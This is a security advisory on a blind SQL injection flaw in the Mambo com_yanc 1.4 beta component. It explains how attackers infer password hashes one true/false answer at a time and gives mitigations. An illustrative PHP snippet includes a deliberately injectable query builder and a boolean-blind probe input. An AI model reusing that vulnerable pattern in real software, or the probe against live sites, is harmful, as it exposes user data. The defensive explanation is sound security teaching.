Vendor: Mambo (com_yanc component; component author unknown)
CVSS: 7.5 (HIGH)
Vulnerability Class: Blind Remote SQL Injection
CWE: 89 (SQL Injection)
Product Name: com_yanc
Affected Version From: 1.4 beta
Affected Version To: 1.4 beta
Patch Exists: NO
Related CWE: none listed
CPE: a:mambo:com_yanc:1.4_beta
Platforms Tested: not listed
Year: 2007
Mambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln
The com_yanc v1.4 beta component for Mambo is vulnerable to blind remote SQL injection. The value of the injectable request parameter (named 'id' in the advisory title and 'listid' in the original description) is placed into a database query by the component's 'index.php' entry point without validation or escaping. Because the page does not return query results or database errors to the attacker directly, the injection is blind: the attacker appends a condition to the parameter and infers data one true/false answer at a time from differences in the page response (or in response timing). Repeated over many requests, this lets a remote attacker extract sensitive data such as usernames and password hashes from the 'mos_users' table.
Mitigation:
The vendor has not released a patch for this vulnerability. Users are advised to upgrade to a newer version of the component if one is available, or to disable the component until it can be replaced. Developers should cast numeric parameters such as a list identifier to integers before they reach the query, and use parameterized queries (or, at minimum, proper escaping) for any string input; site operators can additionally restrict access to the component or filter the parameter at the web server as a stop-gap.
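The following is an added illustration, not code from com_yanc or from Mambo: a hypothetical PHP query-building routine written the way many 2007-era components concatenated request values, beside a hardened version that casts the identifier to an integer. The parameter name 'listid' is taken from the description above; the table name 'mos_yanc_lists' and the column names are assumptions chosen for the example.

```php
<?php
// Added example (not the com_yanc source). Both functions only build the SQL
// string so the difference can be inspected without a database connection.
// Assumed names: table mos_yanc_lists and column id are illustrative.

// VULNERABLE pattern: the raw request value is dropped into the query.
// A request of listid=1 AND 1=1 versus listid=1 AND 1=2 changes whether rows
// come back; that visible true/false difference is all a blind injection needs.
function buildListQueryVulnerable(array $request): string {
    $listid = isset($request['listid']) ? $request['listid'] : '';
    return "SELECT * FROM mos_yanc_lists WHERE id = " . $listid;
}

// HARDENED pattern: the parameter is an integer identifier, so cast it first.
// Anything that is not a plain number collapses to 0 (here rejected as
// invalid), and the injected SQL never reaches the query string.
function buildListQueryHardened(array $request): ?string {
    $listid = isset($request['listid']) ? intval($request['listid']) : 0;
    if ($listid <= 0) {
        return null; // invalid or missing id: caller should render "not found"
    }
    return "SELECT * FROM mos_yanc_lists WHERE id = " . $listid;
}

// Constructed sample input: a boolean-blind probe of the kind described above.
$probe = ['listid' => '1 AND 1=2'];
echo "vulnerable: " . buildListQueryVulnerable($probe) . "\n";
echo "hardened:   " . var_export(buildListQueryHardened($probe), true) . "\n";
// The vulnerable query keeps the attacker's "AND 1=2"; the hardened version
// reduces the input to the integer 1 and emits "... WHERE id = 1".
```

For parameters that are genuinely strings (names, search terms) the integer cast does not apply; those belong in a parameterized query (for example PDO prepared statements) rather than in a concatenated string.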